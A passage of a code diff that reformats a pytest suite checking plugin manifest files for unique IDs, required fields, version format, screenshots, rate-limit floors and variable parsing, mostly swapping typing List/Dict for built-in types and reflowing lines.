     """Tests to ensure all plugin IDs are unique."""
-    
+
     def test_all_plugin_ids_are_unique(self):
         """CI Test: Ensure no duplicate plugin IDs exist.
-        
+
         This test fails if two or more plugins share the same ID,
         which would cause conflicts in the plugin registry.
         """
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        ids_seen: Dict[str, str] = {}  # id -> directory name
-        duplicates: List[str] = []
-        
+
+        ids_seen: dict[str, str] = {}  # id -> directory name
+        duplicates: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
             plugin_id = manifest.get("id", "")
-            
+
             if plugin_id in ids_seen:
                 duplicates.append(
-                    f"Plugin ID '{plugin_id}' is used by both "
-                    f"'{ids_seen[plugin_id]}' and '{plugin_dir.name}'"
+                    f"Plugin ID '{plugin_id}' is used by both '{ids_seen[plugin_id]}' and '{plugin_dir.name}'"
                 )
             else:
                 ids_seen[plugin_id] = plugin_dir.name
-        
-        assert not duplicates, (
-            "Duplicate plugin IDs found:\n" + "\n".join(f"  - {d}" for d in duplicates)
-        )
-    
+
+        assert not duplicates, "Duplicate plugin IDs found:\n" + "\n".join(f"  - {d}" for d in duplicates)
+
     def test_plugin_id_matches_directory_name(self):
         """CI Test: Ensure plugin ID matches its directory name.
-        
+
         This convention makes it easier to locate plugins and prevents confusion.
         """
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        mismatches: List[str] = []
-        
+
+        mismatches: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
             plugin_id = manifest.get("id", "")
             dir_name = plugin_dir.name
-            
+
             if plugin_id != dir_name:
-                mismatches.append(
-                    f"Plugin in '{dir_name}/' has ID '{plugin_id}' "
-                    f"(expected '{dir_name}')"
-                )
-        
-        assert not mismatches, (
-            "Plugin ID/directory mismatches found:\n" + 
-            "\n".join(f"  - {m}" for m in mismatches)
-        )
+                mismatches.append(f"Plugin in '{dir_name}/' has ID '{plugin_id}' (expected '{dir_name}')")
+
+        assert not mismatches, "Plugin ID/directory mismatches found:\n" + "\n".join(f"  - {m}" for m in mismatches)
 
 
 class TestManifestValidity:
     """Tests to ensure all manifests are valid."""
-    
+
     def test_all_manifests_are_valid_json(self):
         """CI Test: All manifest.json files must be valid JSON."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        invalid: List[str] = []
-        
+
+        invalid: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 invalid.append(f"{plugin_dir.name}: manifest.json not found")
                 continue
-            
+
             try:
-                with open(manifest_path, "r", encoding="utf-8") as f:
+                with open(manifest_path, encoding="utf-8") as f:
                     json.load(f)
             except json.JSONDecodeError as e:
                 invalid.append(f"{plugin_dir.name}: Invalid JSON - {e}")
-        
-        assert not invalid, (
-            "Invalid manifest files found:\n" + "\n".join(f"  - {i}" for i in invalid)
-        )
-    
+
+        assert not invalid, "Invalid manifest files found:\n" + "\n".join(f"  - {i}" for i in invalid)
+
     def test_all_manifests_have_required_fields(self):
         """CI Test: All manifests must have required fields (id, name, version)."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
+
         required_fields = ["id", "name", "version"]
-        missing: List[str] = []
-        
+        missing: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
-            
+
             for field in required_fields:
                 if field not in manifest:
                     missing.append(f"{plugin_dir.name}: missing '{field}'")
-        
-        assert not missing, (
-            "Manifests missing required fields:\n" + "\n".join(f"  - {m}" for m in missing)
-        )
-    
+
+        assert not missing, "Manifests missing required fields:\n" + "\n".join(f"  - {m}" for m in missing)
+
     def test_plugin_id_format(self):
         """CI Test: Plugin IDs must be valid identifiers (lowercase, underscores)."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        invalid_ids: List[str] = []
-        
+
+        invalid_ids: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
             plugin_id = manifest.get("id", "")
-            
+
             if not plugin_id:
                 invalid_ids.append(f"{plugin_dir.name}: empty ID")
             elif not plugin_id[0].isalpha() or not plugin_id[0].islower():
                 invalid_ids.append(f"{plugin_dir.name}: ID '{plugin_id}' must start with lowercase letter")
-            elif not all(c.islower() or c.isdigit() or c == '_' for c in plugin_id):
+            elif not all(c.islower() or c.isdigit() or c == "_" for c in plugin_id):
                 invalid_ids.append(f"{plugin_dir.name}: ID '{plugin_id}' contains invalid characters")
-        
-        assert not invalid_ids, (
-            "Invalid plugin IDs found:\n" + "\n".join(f"  - {i}" for i in invalid_ids)
-        )
-    
+
+        assert not invalid_ids, "Invalid plugin IDs found:\n" + "\n".join(f"  - {i}" for i in invalid_ids)
+
     def test_version_format(self):
         """CI Test: Version must be semantic versioning format (X.Y.Z)."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        invalid_versions: List[str] = []
-        
+
+        invalid_versions: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
             version = manifest.get("version", "")
-            
+
             if not version:
                 invalid_versions.append(f"{plugin_dir.name}: missing version")
                 continue
-            
+
             parts = version.split(".")
             if len(parts) != 3:
                 invalid_versions.append(f"{plugin_dir.name}: version '{version}' must be X.Y.Z format")
             elif not all(part.isdigit() for part in parts):
                 invalid_versions.append(f"{plugin_dir.name}: version '{version}' parts must be integers")
-        
-        assert not invalid_versions, (
-            "Invalid version formats found:\n" + "\n".join(f"  - {v}" for v in invalid_versions)
+
+        assert not invalid_versions, "Invalid version formats found:\n" + "\n".join(
+            f"  - {v}" for v in invalid_versions
         )
 
     def test_repository_url_capitalization(self):
@@ -234,7 +219,7 @@ class TestManifestValidity:
         if not plugins:
             pytest.skip("No plugins found")
 
-        wrong_urls: List[str] = []
+        wrong_urls: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -247,81 +232,73 @@ class TestManifestValidity:
                 continue
 
             if repo != canonical_repo_url:
-                wrong_urls.append(
-                    f"{plugin_dir.name}: repository is '{repo}' "
-                    f"(expected '{canonical_repo_url}')"
-                )
+                wrong_urls.append(f"{plugin_dir.name}: repository is '{repo}' (expected '{canonical_repo_url}')")
 
-        assert not wrong_urls, (
-            "Manifests with incorrect repository URL (check capitalization):\n"
-            + "\n".join(f"  - {w}" for w in wrong_urls)
+        assert not wrong_urls, "Manifests with incorrect repository URL (check capitalization):\n" + "\n".join(
+            f"  - {w}" for w in wrong_urls
         )
 
 
 class TestPluginStructure:
     """Tests for plugin directory structure."""
-    
+
     def test_all_plugins_have_init_file(self):
         """CI Test: All plugins must have __init__.py."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        missing: List[str] = []
-        
+
+        missing: list[str] = []
+
         for plugin_dir in plugins:
             init_file = plugin_dir / "__init__.py"
             if not init_file.exists():
                 missing.append(plugin_dir.name)
-        
-        assert not missing, (
-            "Plugins missing __init__.py:\n" + "\n".join(f"  - {m}" for m in missing)
-        )
-    
+
+        assert not missing, "Plugins missing __init__.py:\n" + "\n".join(f"  - {m}" for m in missing)
+
     def test_all_plugins_have_manifest(self):
         """CI Test: All plugins must have manifest.json."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        missing: List[str] = []
-        
+
+        missing: list[str] = []
+
         for plugin_dir in plugins:
             manifest_file = plugin_dir / "manifest.json"
             if not manifest_file.exists():
                 missing.append(plugin_dir.name)
-        
-        assert not missing, (
-            "Plugins missing manifest.json:\n" + "\n".join(f"  - {m}" for m in missing)
-        )
-    
+
+        assert not missing, "Plugins missing manifest.json:\n" + "\n".join(f"  - {m}" for m in missing)
+
     def test_all_plugins_have_tests_directory(self):
         """CI Test: All plugins should have a tests/ directory.
-        
+
         Note: This is a warning-level test. New plugins must have tests,
         but this test ensures visibility of plugins without tests.
         """
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        missing_tests: List[str] = []
-        
+
+        missing_tests: list[str] = []
+
         for plugin_dir in plugins:
             tests_dir = plugin_dir / "tests"
             if not tests_dir.exists() or not tests_dir.is_dir():
                 missing_tests.append(plugin_dir.name)
-        
+
         # This test passes but logs warnings
         # In strict mode (via validate_plugins.py --strict), this would fail
         if missing_tests:
             pytest.warns(
                 UserWarning,
                 match="Plugins without tests directory",
-            ) if hasattr(pytest, 'warns') else None
+            ) if hasattr(pytest, "warns") else None
             # Log for visibility even if test passes
             print(f"\nWarning: Plugins without tests/: {', '.join(missing_tests)}")
 
@@ -335,7 +312,7 @@ class TestPluginRateLimits:
         if not plugins:
             pytest.skip("No plugins found")
 
-        invalid: List[str] = []
+        invalid: list[str] = []
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
@@ -345,17 +322,12 @@ class TestPluginRateLimits:
             if floor is None:
                 continue
             if not isinstance(floor, int) or floor <= 0:
-                invalid.append(
-                    f"{plugin_dir.name}: min_refresh_seconds must be a positive integer, "
-                    f"got {floor!r}"
-                )
-        assert not invalid, (
-            "Invalid min_refresh_seconds:\n" + "\n".join(f"  - {i}" for i in invalid)
-        )
+                invalid.append(f"{plugin_dir.name}: min_refresh_seconds must be a positive integer, got {floor!r}")
+        assert not invalid, "Invalid min_refresh_seconds:\n" + "\n".join(f"  - {i}" for i in invalid)
 
     def test_min_refresh_seconds_lte_schema_minimum(self):
         """CI Test: min_refresh_seconds must be <= settings_schema minimum.
-        
+
         The schema minimum is the user-facing lower bound shown in the UI.
         The hard floor must not exceed it, otherwise users would see a
         minimum in the UI that is lower than what the runtime enforces.
@@ -364,7 +336,7 @@ class TestPluginRateLimits:
         if not plugins:
             pytest.skip("No plugins found")
 
-        inconsistent: List[str] = []
+        inconsistent: list[str] = []
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
@@ -379,13 +351,9 @@ class TestPluginRateLimits:
             schema_min = refresh.get("minimum")
             if schema_min is not None and floor > schema_min:
                 inconsistent.append(
-                    f"{plugin_dir.name}: min_refresh_seconds ({floor}) > "
-                    f"settings_schema minimum ({schema_min})"
+                    f"{plugin_dir.name}: min_refresh_seconds ({floor}) > settings_schema minimum ({schema_min})"
                 )
-        assert not inconsistent, (
-            "Inconsistent rate-limit floors:\n"
-            + "\n".join(f"  - {i}" for i in inconsistent)
-        )
+        assert not inconsistent, "Inconsistent rate-limit floors:\n" + "\n".join(f"  - {i}" for i in inconsistent)
 
     def test_plugins_with_refresh_seconds_have_floor(self):
         """CI Test: Plugins declaring refresh_seconds should have a rate-limit floor.
@@ -399,7 +367,7 @@ class TestPluginRateLimits:
         if not plugins:
             pytest.skip("No plugins found")
 
-        missing: List[str] = []
+        missing: list[str] = []
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
@@ -416,8 +384,7 @@ class TestPluginRateLimits:
                 missing.append(plugin_dir.name)
         assert not missing, (
             "Plugins with refresh_seconds but no rate-limit floor "
-            "(add min_refresh_seconds or a schema minimum):\n"
-            + "\n".join(f"  - {m}" for m in missing)
+            "(add min_refresh_seconds or a schema minimum):\n" + "\n".join(f"  - {m}" for m in missing)
         )
 
 
@@ -428,8 +395,7 @@ class TestManifestVariablesParsing:
         """PluginManifest.from_dict handles the legacy list format for simple variables."""
         from src.plugins.manifest import PluginManifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"simple": ["a", "b", "c"]}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": {"simple": ["a", "b", "c"]}}
         manifest = PluginManifest.from_dict(data)
         assert manifest.variables.simple == ["a", "b", "c"]
         assert manifest.variables.metadata == {}
@@ -439,7 +405,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "simple": {
                     "temperature": {
@@ -468,7 +436,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "groups": {
                     "time": {"label": "Time"},
@@ -494,8 +464,7 @@ class TestManifestVariablesParsing:
         """auto_discover defaults to False when variables.simple is declared."""
         from src.plugins.manifest import PluginManifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"simple": ["a"]}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": {"simple": ["a"]}}
         manifest = PluginManifest.from_dict(data)
         assert manifest.variables.auto_discover is False
 
@@ -503,8 +472,7 @@ class TestManifestVariablesParsing:
         """Explicit auto_discover flag overrides the smart default."""
         from src.plugins.manifest import PluginManifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"auto_discover": True, "simple": ["a"]}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": {"auto_discover": True, "simple": ["a"]}}
         manifest = PluginManifest.from_dict(data)
         assert manifest.variables.auto_discover is True
 
@@ -524,7 +492,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "simple": {
                     "temp": {"description": "Temperature", "type": "number"},
@@ -545,7 +515,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "simple": {
                     "temp": {"max_length": 3},
@@ -562,7 +534,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "max_lengths": {"temp": 5},
             "variables": {
                 "simple": {"temp": {"max_length": 3}},
@@ -576,7 +550,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import validate_manifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {"simple": {"a": {"description": "A var"}}},
         }
         is_valid, errors = validate_manifest(data)
@@ -587,7 +563,9 @@ class TestManifestVariablesParsing:
         from src.plugins.manifest import validate_manifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {"simple": "not_valid"},
         }
         is_valid, errors = validate_manifest(data)
@@ -605,7 +583,7 @@ class TestManifestScreenshots:
         if not plugins:
             pytest.skip("No plugins found")
 
-        missing_files: List[str] = []
+        missing_files: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -622,14 +600,10 @@ class TestManifestScreenshots:
                 normalised = src.lstrip("./")
                 full_path = plugin_dir / normalised
                 if not full_path.exists():
-                    missing_files.append(
-                        f"{plugin_dir.name}: screenshots entry '{src}' "
-                        f"not found at {full_path}"
-                    )
+                    missing_files.append(f"{plugin_dir.name}: screenshots entry '{src}' not found at {full_path}")
 
-        assert not missing_files, (
-            "Screenshot files referenced in manifests do not exist:\n"
-            + "\n".join(f"  - {f}" for f in missing_files)
+        assert not missing_files, "Screenshot files referenced in manifests do not exist:\n" + "\n".join(
+            f"  - {f}" for f in missing_files
         )
 
     def test_screenshots_array_is_list_when_present(self):
@@ -639,7 +613,7 @@ class TestManifestScreenshots:
         if not plugins:
             pytest.skip("No plugins found")
 
-        invalid: List[str] = []
+        invalid: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -649,14 +623,9 @@ class TestManifestScreenshots:
             manifest = load_manifest(plugin_dir)
             screenshots = manifest.get("screenshots")
             if screenshots is not None and not isinstance(screenshots, list):
-                invalid.append(
-                    f"{plugin_dir.name}: 'screenshots' must be an array, "
-                    f"got {type(screenshots).__name__}"
-                )
+                invalid.append(f"{plugin_dir.name}: 'screenshots' must be an array, got {type(screenshots).__name__}")
 
-        assert not invalid, (
-            "Invalid screenshots field types:\n" + "\n".join(f"  - {i}" for i in invalid)
-        )
+        assert not invalid, "Invalid screenshots field types:\n" + "\n".join(f"  - {i}" for i in invalid)
 
     def test_each_screenshot_entry_has_src(self):
         """CI Test: Each screenshot entry must have a 'src' field."""
@@ -665,7 +634,7 @@ class TestManifestScreenshots:
         if not plugins:
             pytest.skip("No plugins found")
 
-        missing_src: List[str] = []
+        missing_src: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -677,13 +646,9 @@ class TestManifestScreenshots:
 
             for idx, screenshot in enumerate(screenshots):
                 if not isinstance(screenshot, dict) or "src" not in screenshot:
-                    missing_src.append(
-                        f"{plugin_dir.name}: screenshots[{idx}] missing 'src' field"
-                    )
+                    missing_src.append(f"{plugin_dir.name}: screenshots[{idx}] missing 'src' field")
 
-        assert not missing_src, (
-            "Screenshot entries missing 'src':\n" + "\n".join(f"  - {s}" for s in missing_src)
-        )
+        assert not missing_src, "Screenshot entries missing 'src':\n" + "\n".join(f"  - {s}" for s in missing_src)
 
     def test_at_most_one_primary_screenshot(self):
         """CI Test: At most one screenshot should have primary=true."""
@@ -692,7 +657,7 @@ class TestManifestScreenshots:
         if not plugins:
             pytest.skip("No plugins found")
 
-        multiple_primary: List[str] = []
+        multiple_primary: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -701,18 +666,14 @@ class TestManifestScreenshots:
 
             manifest = load_manifest(plugin_dir)
             screenshots = manifest.get("screenshots", [])
-            primary_count = sum(
-                1 for s in screenshots if isinstance(s, dict) and s.get("primary") is True
-            )
+            primary_count = sum(1 for s in screenshots if isinstance(s, dict) and s.get("primary") is True)
             if primary_count > 1:
                 multiple_primary.append(
-                    f"{plugin_dir.name}: {primary_count} screenshots marked as primary "
-                    f"(only one allowed)"
+                    f"{plugin_dir.name}: {primary_count} screenshots marked as primary (only one allowed)"
                 )
 
-        assert not multiple_primary, (
-            "Plugins with multiple primary screenshots:\n"
-            + "\n".join(f"  - {m}" for m in multiple_primary)
+        assert not multiple_primary, "Plugins with multiple primary screenshots:\n" + "\n".join(
+            f"  - {m}" for m in multiple_primary
         )
 
 
@@ -726,7 +687,7 @@ class TestManifestCompleteness:
         if not plugins:
             pytest.skip("No plugins found")
 
-        missing: List[str] = []
+        missing: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -737,10 +698,7 @@ class TestManifestCompleteness:
             if "settings_schema" not in manifest:
                 missing.append(plugin_dir.name)
 
-        assert not missing, (
-            "Plugins missing 'settings_schema':\n"
-            + "\n".join(f"  - {m}" for m in missing)
-        )
+        assert not missing, "Plugins missing 'settings_schema':\n" + "\n".join(f"  - {m}" for m in missing)
 
     def test_all_manifests_have_variables(self):
         """CI Test: All plugin manifests should define a variables section."""
@@ -749,7 +707,7 @@ class TestManifestCompleteness:
         if not plugins:
             pytest.skip("No plugins found")
 
-        missing: List[str] = []
+        missing: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -760,10 +718,7 @@ class TestManifestCompleteness:
             if "variables" not in manifest:
                 missing.append(plugin_dir.name)
 
-        assert not missing, (
-            "Plugins missing 'variables':\n"
-            + "\n".join(f"  - {m}" for m in missing)
-        )
+        assert not missing, "Plugins missing 'variables':\n" + "\n".join(f"  - {m}" for m in missing)
 
     def test_settings_schema_is_object_type(self):
         """CI Test: settings_schema must be a JSON object with 'type': 'object'."""
@@ -772,7 +727,7 @@ class TestManifestCompleteness:
         if not plugins:
             pytest.skip("No plugins found")
 
-        invalid: List[str] = []
+        invalid: list[str] = []
 
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
@@ -787,83 +742,74 @@ class TestManifestCompleteness:
                 invalid.append(f"{plugin_dir.name}: settings_schema must be a dict")
             elif schema.get("type") != "object":
                 invalid.append(
-                    f"{plugin_dir.name}: settings_schema['type'] must be 'object', "
-                    f"got {schema.get('type')!r}"
+                    f"{plugin_dir.name}: settings_schema['type'] must be 'object', got {schema.get('type')!r}"
                 )
 
-        assert not invalid, (
-            "Manifests with invalid settings_schema:\n"
-            + "\n".join(f"  - {i}" for i in invalid)
-        )
+        assert not invalid, "Manifests with invalid settings_schema:\n" + "\n".join(f"  - {i}" for i in invalid)
 
 
 class TestPluginIconsAndCategories:
     """Tests for plugin display configuration."""
-    
+
     def test_icon_values_are_valid_strings(self):
         """CI Test: Icon field should be a valid string if present."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
-        invalid: List[str] = []
-        
+
+        invalid: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
             icon = manifest.get("icon")
-            
+
             if icon is not None and not isinstance(icon, str):
                 invalid.append(f"{plugin_dir.name}: icon must be a string, got {type(icon).__name__}")
             elif icon is not None and len(icon) == 0:
                 invalid.append(f"{plugin_dir.name}: icon cannot be empty string")
-        
-        assert not invalid, (
-            "Invalid icon values:\n" + "\n".join(f"  - {i}" for i in invalid)
-        )
-    
+
+        assert not invalid, "Invalid icon values:\n" + "\n".join(f"  - {i}" for i in invalid)
+
     def test_category_values_are_valid(self):
         """CI Test: Category field should be a valid category if present."""
         plugins = get_plugin_directories()
-        
+
         if not plugins:
             pytest.skip("No plugins found")
-        
+
         valid_categories = {"art", "data", "transit", "weather", "entertainment", "utility", "home"}
-        invalid: List[str] = []
-        
+        invalid: list[str] = []
+
         for plugin_dir in plugins:
             manifest_path = plugin_dir / "manifest.json"
             if not manifest_path.exists():
                 continue
-            
+
             manifest = load_manifest(plugin_dir)
             category = manifest.get("category")
-            
+
             if category is not None and category not in valid_categories:
-                invalid.append(
-                    f"{plugin_dir.name}: category '{category}' not in {valid_categories}"
-                )
-        
-        assert not invalid, (
-            "Invalid category values:\n" + "\n".join(f"  - {i}" for i in invalid)
-        )
+                invalid.append(f"{plugin_dir.name}: category '{category}' not in {valid_categories}")
+
+        assert not invalid, "Invalid category values:\n" + "\n".join(f"  - {i}" for i in invalid)
 
 
 # ---------------------------------------------------------------------------
 # Unit tests for manifest.py internals (not CI plugin-directory scans)
 # ---------------------------------------------------------------------------
 
+
 class TestVariableNamesSubArrays:
     """Tests for VariablesSchema.get_all_variable_names with sub-arrays."""
 
     def test_get_all_variable_names_with_sub_arrays(self):
         """get_all_variable_names includes sub-array field patterns."""
-        from src.plugins.manifest import VariablesSchema, VariableArraySchema
+        from src.plugins.manifest import VariableArraySchema, VariablesSchema
 
         sub = VariableArraySchema(
             name="legs",
@@ -905,7 +851,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "simple": {
                     "alpha": "just_a_string",
@@ -924,7 +872,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {"simple": 42},
         }
         manifest = PluginManifest.from_dict(data)
@@ -935,7 +885,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "groups": {
                     "misc": "Miscellaneous",
@@ -951,7 +903,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {"groups": "invalid", "simple": ["a"]},
         }
         manifest = PluginManifest.from_dict(data)
@@ -962,7 +916,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "screenshots": [
                 {"src": "docs/board.png", "alt": "Board", "caption": "Main", "primary": True},
                 {"src": "docs/config.png", "alt": "Config"},
@@ -981,7 +937,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "screenshots": [
                 {"src": "docs/board.png"},
                 "not_a_dict",
@@ -998,7 +956,9 @@ class TestFromDictEdgeCases:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "arrays": {
                     "routes": {
@@ -1011,7 +971,7 @@ class TestFromDictEdgeCases:
                                 "item_fields": ["stop_name", "arrival"],
                                 "label_field": "stop_name",
                             }
-                        }
+                        },
                     }
                 }
             },
@@ -1036,15 +996,20 @@ class TestToDictSerialization:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test_plugin", "name": "Test Plugin", "version": "2.0.0",
-            "description": "A test", "author": "Tester",
-            "repository": "https://example.com", "documentation": "DOCS.md",
+            "id": "test_plugin",
+            "name": "Test Plugin",
+            "version": "2.0.0",
+            "description": "A test",
+            "author": "Tester",
+            "repository": "https://example.com",
+            "documentation": "DOCS.md",
             "settings_schema": {"type": "object"},
             "env_vars": [{"name": "API_KEY"}],
             "variables": {"simple": ["temp"]},
             "max_lengths": {"temp": 5},
             "color_rules_schema": {"rules": []},
-            "icon": "thermometer", "category": "weather",
+            "icon": "thermometer",
+            "category": "weather",
             "fiestaboard_version": ">=2.0.0",
             "supports_triggers": True,
             "screenshots": [
@@ -1089,11 +1054,18 @@ class TestToDictSerialization:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "simple": {
-                    "temp": {"description": "Temperature", "type": "number",
-                             "max_length": 5, "group": "current", "example": "72"},
+                    "temp": {
+                        "description": "Temperature",
+                        "type": "number",
+                        "max_length": 5,
+                        "group": "current",
+                        "example": "72",
+                    },
                 },
             },
         }
@@ -1113,7 +1085,9 @@ class TestToDictSerialization:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {
                 "groups": {"time": {"label": "Time Info"}},
                 "simple": ["hour"],
@@ -1130,7 +1104,9 @@ class TestToDictSerialization:
         from src.plugins.manifest import PluginManifest
 
         data = {
-            "id": "test", "name": "Test", "version": "1.0.0",
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
             "variables": {"simple": ["a"]},
         }
         manifest = PluginManifest.from_dict(data)
@@ -1194,8 +1170,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects non-dict settings_schema."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "settings_schema": "invalid"}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "settings_schema": "invalid"}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("settings_schema must be an object" in e for e in errors)
@@ -1204,8 +1179,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects non-list env_vars."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "env_vars": "invalid"}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "env_vars": "invalid"}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("env_vars must be an array" in e for e in errors)
@@ -1214,8 +1188,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects env_vars item that is not a dict."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "env_vars": ["not_a_dict"]}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "env_vars": ["not_a_dict"]}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("must be an object" in e for e in errors)
@@ -1224,8 +1197,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects env_vars item missing name field."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "env_vars": [{"description": "no name"}]}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "env_vars": [{"description": "no name"}]}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("missing required field: name" in e for e in errors)
@@ -1234,8 +1206,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects non-dict variables."""
         from src.plugins.manifest import validate_manifest
 
